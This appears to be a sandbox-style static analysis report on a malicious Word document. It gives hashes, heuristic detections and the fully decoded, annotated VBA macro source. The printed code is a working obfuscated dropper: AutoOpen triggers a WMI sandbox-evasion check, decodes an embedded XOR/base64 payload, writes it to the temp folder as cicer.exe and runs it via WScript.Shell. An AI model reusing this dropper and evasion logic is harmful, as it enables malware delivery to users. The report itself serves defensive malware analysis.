Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6a2fa09ae98cb642…

MALICIOUS

Office (OLE)

305.5 KB Created: 2016-06-22 14:39:00 First seen: 2016-08-10
MD5: 8bd7f4c7ca4c06032a481e527dba2a47 SHA-1: 0ba7958ba03cc8f844ec29fe2cb5183dc078c014 SHA-256: 6a2fa09ae98cb642f7dc3dabbfc107a9483d28aa8f6ea015ebcbb0892627706a
368 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6875133-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6875133-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set dicranales = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set dicranales = CreateObject("WScript.Shell")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set hornbeam = GetObject(exacerbate & ".\root\cimv2")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    cryptobiosis = CallByName(encompassment, lg, misguidance, dacoity)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12271 bytes
SHA-256: 9bc5bc63bdf1aa6a432730cd302484a71e59193c81465791a635b954ee2288ba
Preview script
First 1,000 lines of the extracted script
' Module header (as emitted by olevba) for the ThisDocument class module of the decoded
' VBA project. This module holds the AutoOpen entry point plus two decoy Word-automation
' routines; the dropper logic itself lives in the standard module "cetraria" below.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Inserts Symbol-font character 171 at the current selection and again at the collapsed
' start of the active document's range. Decoy routine: it is referenced only from the
' If branch of AutoOpen, which never executes.
Sub InsertSymbolMethod()
   Dim docRange As Object
   Set docRange = ActiveDocument.Range
   Selection.InsertSymbol CharacterNumber:=171, Font:="Symbol", Unicode:=False
   docRange.Collapse Direction:=wdCollapseStart
   docRange.InsertSymbol CharacterNumber:=171, Font:="Symbol", Unicode:=False
End Sub

' Auto-execution entry point: Word runs this when the document is opened (OLE_VBA_AUTOOPEN).
' Sin(20) = 0.913 stored in an Integer rounds to 1, and 118 + 82 + 17 - 573 = -356, so the If
' condition (1 < -356) is never true and the InsertSymbolMethod call is dead code. The Else
' branch always runs; its only meaningful statement is the read of inordinately.ScrollLeft,
' which loads the UserForm module "inordinately" and thereby fires UserForm_Initialize -- the
' real start of the payload chain. The remaining arithmetic, the Select Case on argues (= 9,
' so "Case 1 To 12") and the string assignments are junk whose results are never read.
Public Sub AutoOpen()
Dim homines As Integer
Dim remilitarization As Integer
Dim homoecious As Integer
Dim saliferous As Integer
' Sin(20) = 0.913 -> Integer 1
homoecious = Sin(20)
' right-hand side is -356; the comparison is always False
If homoecious < 118 + 82 + 17 - 573 Then
InsertSymbolMethod
Else
Dim conepatus As Byte
' Touching a member of the UserForm loads it -> UserForm_Initialize runs (see module "inordinately")
blare = inordinately.ScrollLeft
' argues = 9 -> "Case 1 To 12" (junk branch)
argues = 1 - 43 - 110 + 161
Select Case argues
Case 1 To 12
surname = quadrupedal
caller = cercidiphyllaceae
girlhood = Left("sofclawlike", 3) & Ucase("tbOIL") & Mid("architectonicedcurling", 14, 2)
Case 13
blender = picariae
biquadratic = ailing
nominal = Mid("befooledblacromyotonia", 9, 2) + Lcase("Otch") + Right("feudallyy", 1)
Case 15
heightening = laborem
heavendirected = blastomere
End Select

End If
End Sub

' Flips the ShowTextBoundaries setting of the active document's window view; does nothing
' when no document is open. Decoy routine: not referenced by any other code in the listing.
Sub ToggleTextBoundaries()
    Dim docView As Object
    If Documents.Count = 0 Then Exit Sub
    Set docView = ActiveDocument.ActiveWindow.View
    docView.ShowTextBoundaries = Not docView.ShowTextBoundaries
End Sub



' Standard module "cetraria": holds the dropper logic (alignment, ablepharia, curriculum,
' uninspiring, austria and their helpers). The four module-level variables below are only
' ever assigned or rewritten from themselves (Mod, \, Xor, And, ...) and are never read on the
' payload path; they exist as noise for signature/heuristic evasion.
Attribute VB_Name = "cetraria"
Dim insider
Dim stereognostic
Dim autoradiographic As Long
Dim ulna
  ' Deletes every hyperlink and every bookmark in the active document and unlinks every
  ' field. Returns nothing (Variant Empty). Decoy routine: not referenced by any other
  ' code in the listing.
  Function Strip_Hyperlinks_Bookmarks_Fields()
      Dim lnk As Hyperlink
      Dim bmk As Bookmark
      Dim fld As Field
      Dim doc As Object
      Set doc = ActiveDocument
      For Each lnk In doc.Hyperlinks: lnk.Delete: Next lnk
      For Each bmk In doc.Bookmarks: bmk.Delete: Next bmk
      For Each fld In doc.Fields: fld.Unlink: Next fld
  End Function


' Returns `blockage` converted with StrConv(..., 128); 128 is vbFromUnicode, so the result
' is the string's characters as a single-byte array (the form Put writes to disk in
' uninspiring). The remaining locals and assignments are junk; `gaucherie` is an undeclared
' name (no Option Explicit in this module) and evaluates to Empty.
Function bonsai(blockage)
Dim mystically As Variant
Dim avo As Integer
Dim poem As Variant
' 128 = vbFromUnicode
butterfish = StrConv(blockage, 128)
complex = gaucherie
attaghan = Mid("asportationabredhead", 12, 2) & "watt"
bonsai = butterfish
End Function
' Late-bound method call: invokes the method named by `lg` on object `lineman`, passing
' `dacoity` as its argument. misguidance = 17 - 16 = 1 and Sin(1) <> 51 is always True, so lg
' is assembled as Mid("armholerupeopled", 8, 2) & Mid("chickadeendragonnade", 10, 1)
' = "ru" & "n" = "run"; the "telegonous" branch is unreachable. CallByName's third argument
' (1 = VbMethod) selects a method call. On the payload path alignment passes the WScript.Shell
' object as lineman and the dropped file path as dacoity, i.e. WScript.Shell.Run(<path>).
Sub mignonette(lineman, dacoity)
Dim cropdusting As Integer
Set encompassment = lineman
' = 1, reused below both as the comparison input and as the VbMethod call type
misguidance = 17 - 16
If Sin(misguidance) <> 51 Then
' "ru" & "n"
lg = Mid("armholerupeopled", 8, 2) + Mid("chickadeendragonnade", 10, 1)
Else
lg = "telegonous"
End If
cryptobiosis = CallByName(encompassment, lg, misguidance, dacoity)
End Sub
' Opens the file at path `unheaded` in binary read/write mode on file number `chevronne`
' (Open ... For Binary creates the file when it does not exist). Called from alignment with
' the drop path and a FreeFile number; the bytes are written later by Put in uninspiring.
Sub bassariscidae(unheaded, chevronne)
Open unheaded For Binary Access Read Write As #chevronne
End Sub

' Core dropper routine, called from UserForm_Initialize when the environment check in
' austria passes. Every Select Case selector is a constant, so exactly one branch of each
' block runs; the reconstructed flow is:
'   1. penetrate = ablepharia()           -> FSO.GetSpecialFolder(2), the temporary folder
'   2. mohair = 58  -> flirt = penetrate & "\cicer.exe"; retractile = FreeFile
'   3. bassariscidae flirt, retractile    -> open that path for binary read/write
'   4. exosphere = inordinately.whipper   -> encoded payload read from a member named
'      "whipper" of the UserForm (the form's stored contents are not in this listing)
'   5. hug = 62     -> cheering = exosphere
'   6. biface = 66  -> bujumbura = curriculum(cheering)   (XOR 16 + base64 decode)
'   7. aspidistra = 57 -> cetraria.uninspiring bujumbura, sixpenny, retractile (Put to file)
'   8. narrow = 66  -> Close #retractile; dicranales = CreateObject("WScript.Shell")
'   9. mignonette dicranales, flirt       -> WScript.Shell.Run(flirt)
' Everything else (module-variable arithmetic, Dim statements inside Case blocks, string
' concatenations whose results are never read) is padding with no effect on the outcome.
Sub alignment()
insider = "exodontics"
homemaker = "alephnull"
Dim penetrate As String
autoradiographic = autoradiographic Mod 403
' Sin(18) = -0.75, so this is always True
If Sin(18) <> 63 Then
Dim flirt As String
' temporary-folder path (see ablepharia)
penetrate = ablepharia
Dim inebriates As Byte
Else
herbist = bedizened
End If
' selects "Case 58 To 58"
mohair = 58
Select Case mohair
Case 36 To 40
Dim agleam As Byte

stereognostic = stereognostic \ 78
iapetus = ctenidium
Case 22 To 30
Dim whitmonday As Variant

stereognostic = stereognostic + 114
frailty = Lcase("ta") & Lcase("PEst") & Mid("complexlyrypleasurableness", 10, 2)
Case 58 To 58
' "\" & "ci" & "cer." & "exe" -> <temp>\cicer.exe
flirt = penetrate + "\" + Lcase("ci") & Lcase("cEr.") & Mid("autarkyexecontre", 8, 3)
cyst = plumbaginales
retractile = FreeFile

End Select
autoradiographic = autoradiographic + 158
cariamidae = 120 - 120
stereognostic = stereognostic And 302
' = 0; passed to uninspiring as its unused second argument
sixpenny = cariamidae

' create/open the drop file
bassariscidae flirt, retractile
' encoded payload pulled from the UserForm
exosphere = inordinately.whipper
' selects "Case 62 To 62"
hug = 62
Select Case hug
Case 37 To 44
Dim controlled As Integer

insider = "mansized"
amaryllidaceae = uppercut
Case 37 To 39
Dim aft As Long

ulna = "perkily"
mam = businessman
Case 62 To 62
insider = "brazenly"
cheering = exosphere

End Select
' = 66 -> "Case 66 To 66"
biface = 94 - 124 - 48 + 144
Select Case biface
Case 9 To 14
Dim beadle As Long

ulna = "remaining"
astraphobia = Ucase("UNd") + Ucase("ERWOO") + Lcase("D")
Case 3 To 9
Dim exaction As Variant

ulna = Right("alignmentcho", 3) + "rography"
pileous = fagend
Case 66 To 66
ulna = Right("sulkmi", 2) & "stfl" & Ucase("oWeR")
' decode the payload bytes
bujumbura = curriculum(cheering)
carvelbuilt = Len(bujumbura)
Dim xi As Long

End Select
stereognostic = stereognostic Xor 299
insider = "ac" + Ucase("iDiFy")
autoradiographic = autoradiographic Mod 160
' = 57 -> "Case 57 To 57"
aspidistra = 41 + 16
Select Case aspidistra
Case 38 To 43
Dim armillary As Byte

stereognostic = stereognostic \ 196
labridae = Left("discbeanfeast", 4) & Mid("agronomistountenacondenser", 11, 7) & StrReverse("ecn")
Case 2 To 6
Dim shikoku As Variant

ulna = "fishy"
blatantly = Lcase("zE") & Right("deafeningstful", 5)
Case 29 To 30
Dim superficiality As Integer

stereognostic = stereognostic + 377
last = StrReverse("ah") & StrReverse("eruhc")
Case 57 To 57
' write decoded bytes into the open drop file
cetraria.uninspiring bujumbura, sixpenny, retractile
insider = "effectively"

End Select
' = 66 -> "Case 66 To 66"
narrow = 122 + 90 - 9 - 137
Select Case narrow
Case 40 To 48
Dim hispaniola As String

autoradiographic = autoradiographic / 240
materialize = backwardness
Case 12 To 13
Dim hammerlock As Long

stereognostic = stereognostic * 3
premiership = desecrating
Case 66 To 66
stereognostic = stereognostic \ 402
Close #retractile
insider = "basifixed"
' OLE_VBA_WSCRIPT / OLE_VBA_CREATEOBJ finding
Set dicranales = CreateObject("WScript.Shell")

End Select
autoradiographic = autoradiographic * 4
' -> CallByName(dicranales, "run", VbMethod, flirt)
mignonette dicranales, flirt
End Sub
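' Switches the active pane to the current page header, writes the text held in MyText into
' it and returns the view to the main document. Decoy routine: not referenced by any other
' code in the listing. Fix: the original assigned the literal "MyText" to the header instead
' of the variable, which left MyText declared and initialised but never used.
Sub HeaderFooterProperty()
   Dim MyText As String
   MyText = "<Replace this with your text>"
   ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader
   Selection.HeaderFooter.Range.Text = MyText
   ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument
End Sub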


' Returns the path of the user's temporary folder, obtained through a late-bound
' Scripting.FileSystemObject. Reconstructed: mans = "Sc" + "ript" + "ing." = "Scripting.";
' expeditious = 66 -> syntagma = "File" + "SystemOb" + "ject" = "FileSystemObject" and
' disenchanting = "Scripting.FileSystemObject"; sodden = 61 -> hf = CreateObject(disenchanting),
' khepera = 1 (VbMethod), etch = "Get" & "Specia" & "lFolder" = "GetSpecialFolder"; the final
' expression is CallByName(hf, "GetSpecialFolder", VbMethod, 2), and 2 is the FSO
' TemporaryFolder constant. All other Case blocks are unreachable junk; the module-level
' variable writes are noise.
Function ablepharia()
Dim capsicum As Variant
Dim gory As Variant
' "Scripting."
mans = Left("Scdriftage", 2) + Lcase("riPt") + "ing."
' = 66 -> "Case 66 To 66"
expeditious = 58 + 57 - 4 - 45
Select Case expeditious
Case 20 To 25
Dim loment As Byte

stereognostic = stereognostic \ 273
meniscus = Ucase("af") + Left("frontapollo", 5)
Case 38 To 39
Dim approved As Integer

insider = "selaginellaceae"
polycirrus = asmodeus
Case 33 To 39
Dim agnition As Byte

ulna = "breve"
rhinotermitidae = Right("aljibarco", 2) + Mid("noddymmonalityfellowfeeling", 6, 9)
Case 66 To 66
' "FileSystemObject"
syntagma = Mid("sometimesFileend", 10, 4) + Right("regaleSystemOb", 8) + Mid("magnajectpenates", 6, 4)
' "Scripting.FileSystemObject"
disenchanting = mans + syntagma

End Select
' = 61 -> "Case 61 To 61"
sodden = 17 + 84 + 96 - 136
Select Case sodden
Case 30 To 31
Dim misconjecture As Byte

insider = Lcase("Gl") & Left("omereagleeyed", 4) & StrReverse("sulu")
inadmissible = Right("centauryat", 2) & Mid("admittabletempermugil", 11, 6)
Case 21 To 22
Dim african As Integer

insider = "es" & Mid("thromboplastinophaceratopetalum", 15, 4) & Right("maldugeal", 4)
farcical = Mid("airstreamchyesterday", 10, 2) & Ucase("IPPeN") & Lcase("dAle")
Case 20 To 23
Dim impropriation As Integer

insider = Right("magazineen", 2) & Ucase("ErGi") & Lcase("d")
skullcap = "st" + StrReverse("sily") + Mid("aeroscopetpenocha", 10, 1)
Case 61 To 61
Dim bustup As String
Set hf = VBA.CreateObject(disenchanting)
' = 1 (VbMethod)
khepera = 61 + 107 - 167
' "GetSpecialFolder"
etch = Mid("accuseGetunrelieved", 7, 3) & Left("Speciahornet", 6) & "lFolder"

End Select
' last argument = 2 -> FSO TemporaryFolder
ablepharia = CallByName(hf, etch, khepera, 70 + 116 - 77 - 107)
End Function

' Payload decoder: XORs every byte of `lancelot` with 16 (&H10), base64-decodes the result
' with a hand-rolled table, and drops the final decoded byte (laical = 1 unconditionally,
' which presumably accounts for "=" padding mapping to 0 in the table). Returns the decoded
' bytes as a String (via StrConv vbUnicode; bonsai reverses that before the file write).
' The obfuscated constants spell out a standard base64 decoder: foots/pantry/fucker =
' 64^1/64^2/64^3 (sextet weights), monkey = &HFF0000, caranday = 65536, associable = &HFF00,
' dissimilarity = 256, clamatores = &HFF (byte extraction masks and divisors); the `changed`
' table maps A-Z -> 0-25, a-z -> 26-51 (outcome = 122 = "z"), 0-9 -> 52-61, "+" -> 62,
' "/" -> 63. rightabout, cfallacy, macron, doublecrosser, the carposporous/diceros
' conditional (141 < 38 is False) and the module-variable writes are junk.
Function curriculum(lancelot) As String
Dim untunable(63) As Long
Dim parsimonia As String
Dim assumiing(63) As Long
autoradiographic = autoradiographic \ 209

Dim chrysophrys As Long
Dim changed(255) As Byte
Dim oryzomys() As Byte
Dim ecstatic(63) As Long
Dim murrey As Long
Dim lymphoma As Long
Dim laical As Integer
ulna = "penology"

Dim aspirant As Long
Dim anadiplosis() As Byte
' &HFF: mask for the low byte
clamatores = 255
rightabout = 54 + 117 + 3861
cfallacy = 63
' 64^1
foots = 64
' &HFF00: mask for the middle byte
associable = 65280
macron = 16515072
' 64^3
fucker = 262144
doublecrosser = 258048
' &HFF0000: mask for the high byte
monkey = 16711680
' = 256
dissimilarity = 56 + 200
' 64^2
pantry = 4096
' = 65536
caranday = 55 - 87 + 65568
Dim deuce As Variant
Dim diode() As Byte
diode = StrConv(lancelot, vbFromUnicode)
Dim epicedium As Integer
' first layer: XOR each input byte with &H10
For arrrange = 0 To UBound(diode)
diode(arrrange) = diode(arrrange) Xor 16
Next arrrange
carposporous = 76
diceros = 65
If carposporous + diceros < 38 Then
carposporous = Lcase("uMB") + "rageo" + Lcase("US")
racial = Lcase("sA") & Right("buonppy", 3)
Else
diceros = 53
End If

burmanniaceae = StrConv(diode, vbUnicode)
laical = 1
' = 122 ("z")
outcome = 52 - 116 - 98 + 284
' base64 alphabet -> sextet value table; unlisted characters (incl. "=") stay 0
For lymphoma = 0 To 255
Select Case lymphoma
Case 65 To 90
changed(lymphoma) = lymphoma - 65
Case 97 To outcome
changed(lymphoma) = lymphoma - 71
Case 48 To 57
changed(lymphoma) = lymphoma + 4
Case 43
changed(lymphoma) = 62
Case 47
changed(lymphoma) = 63
End Select
Next lymphoma
' precomputed sextet weights for positions 2, 1 and 0 of each 4-char group
For lymphoma = 0 To 63
assumiing(lymphoma) = lymphoma * foots
ecstatic(lymphoma) = lymphoma * pantry
untunable(lymphoma) = lymphoma * fucker
Next lymphoma
anadiplosis = StrConv(burmanniaceae, vbFromUnicode)
' = 4 characters per group
avionics = 128 - 124
ReDim oryzomys((((UBound(anadiplosis) + 1) \ avionics) * 3) - 1)
' 4 base64 characters -> 24-bit value -> 3 output bytes
For aspirant = 0 To UBound(anadiplosis) Step 4
chrysophrys = untunable(changed(anadiplosis(aspirant))) + ecstatic(changed(anadiplosis(aspirant + 1))) + _
assumiing(changed(anadiplosis(aspirant + 2))) + changed(anadiplosis(aspirant + 3))
lymphoma = chrysophrys And monkey
oryzomys(murrey) = lymphoma \ caranday
lymphoma = chrysophrys And associable
oryzomys(murrey + 1) = lymphoma \ dissimilarity
oryzomys(murrey + 2) = chrysophrys And clamatores
murrey = murrey + 3
Next aspirant
parsimonia = StrConv(oryzomys, vbUnicode)
' always drops the last character (laical is fixed to 1 above)
If laical Then parsimonia = Left$(parsimonia, Len(parsimonia) - laical)
curriculum = parsimonia
End Function


' Writes the decoded payload to the already-open drop file: bonsai converts `abibis` to a
' byte array (StrConv vbFromUnicode) and Put #epidendron writes it at the current position
' of that file number. `roughhewn` is never used and occasioner is a junk string.
Sub uninspiring(ByRef abibis, roughhewn, epidendron)
Dim bibos As Long
Dim atelectasis() As Byte
Dim stundism As String
atelectasis = bonsai(abibis)
occasioner = Mid("uninspiringmusobeginner", 12, 4) & Right("batrachoididaephagidae", 8)
honeytongued = epidendron
' binary write of the decoded bytes into the file opened by bassariscidae
Put #honeytongued, , atelectasis
End Sub
' Environment check used as the go/no-go gate in UserForm_Initialize. Assembles the WQL
' query "Select * from Win32_Product WHERE Name LIKE 'Python %'" and runs it via
' GetObject("winMGMTS:\\.\root\cimv2").ExecQuery; returns 10 when at least one matching
' product is installed, otherwise Empty. On any error (no WMI, query failure) the handler
' northeasterly simply exits, so the result is also Empty. Because the caller only proceeds
' when the result <> 10, a host with a "Python ..." product installed is skipped -- this
' looks like an analysis-environment/sandbox evasion check (OLE_VBA_GETOBJ finding). The
' Select Case blocks on barley (= 8) and advertising (= 7) are junk.
Function austria()
On Error GoTo northeasterly
Dim aeequa As Long
' "Sel" + "ect *" + " from " = "Select * from "
necessitas = Right("ferociousSel", 3) + Left("ect *chin", 5) + Left(" from pessimal", 6)
Dim aphrophora As String
stereognostic = stereognostic / 115

' "Win32_Product " (Left(...,5) keeps the trailing space)
chronologically = "Win" + "32_Pro" + Left("duct alienated", 5)
' = 8 -> "Case 1 To 9" (junk)
barley = 2 + 69 - 101 + 38
Select Case barley
Case 1 To 9
analytical = afterimage
expectant = wellbound
Case 10
walleye = Right("epitomizeca", 2) + StrReverse("ocar") + Lcase("liTo")
attribution = Ucase("SH") & Left("ortcmisgovernment", 4) & "oming"
overreckon = anomaly
Case 12
bulldog = butter
goahead = Left("ampcornshucking", 3) + Ucase("HIBra") + StrReverse("hc")
dicksoniaceae = efformation
End Select
Dim fretta As Variant
' "WHERE" & " Name LIKE" & " 'Python %'"
courtship = Ucase("whERe") & Right("dachau Name LIKE", 10) & Left(" 'Python %'live", 11)
autoradiographic = autoradiographic / 416

autoradiographic = autoradiographic - 153

' "win" & "MGMTS" & ":\\" = "winMGMTS:\\"
exacerbate = Right("symphysiswin", 3) & Ucase("mGmtS") & Mid("globular:\\metaplasm", 9, 3)
ulna = "adenitis"

' WMI namespace root\cimv2 on the local machine
Set hornbeam = GetObject(exacerbate & ".\root\cimv2")
' = 7 -> "Case 7" (junk)
advertising = 37 + 21 - 51
Select Case advertising
Case 1 To 6
sheets = beati
extravasate = fitting
heliopsis = semidesert
Case 7
brooklyn = funded
iridic = Ucase("GU") & Mid("trawlerriackee", 6, 4) & Mid("clarichordllaillbred", 11, 3)
Case 11
patriarchs = catamaran
investiture = Lcase("ac") & Right("adelgeshene", 4)
End Select
' "Select * from Win32_Product WHERE Name LIKE 'Python %'"
Set fences = hornbeam.ExecQuery(necessitas + chronologically & courtship)
If fences.Count > 0 Then
austria = 10
End If
northeasterly:
End Function


' Module header (as emitted by olevba) for the UserForm module "inordinately". AutoOpen
' loads this form by reading inordinately.ScrollLeft, and alignment reads the encoded
' payload from a member named "whipper"; the form's controls and their stored contents are
' not part of this source listing.
Attribute VB_Name = "inordinately"
Attribute VB_Base = "0{E685E390-8973-4599-A25B-A669844A5CAD}{07F2D21F-2264-43D4-B463-63DE20809D97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Initializer of UserForm "inordinately"; fires when AutoOpen first touches the form
' (inordinately.ScrollLeft). Runs the dropper (cetraria.alignment) unless austria returned
' 10, i.e. unless a product whose name starts with "Python " is installed on the host.
Sub UserForm_Initialize()
If austria <> 10 Then
cetraria.alignment
End If
End Sub